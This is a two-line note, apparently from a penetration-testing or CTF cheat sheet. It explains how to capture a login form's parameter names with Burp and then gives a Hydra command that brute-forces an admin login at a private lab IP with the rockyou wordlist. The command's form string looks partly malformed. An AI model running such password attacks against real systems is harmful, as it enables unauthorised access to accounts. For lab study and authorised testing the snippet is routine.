Use burp when submitting a test user:pass to find the variable names in the post request for user and pass and modify the script below to include those

hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.94.101 http-post-form "/admin/index.php:username=^admin^&password=example_value" -v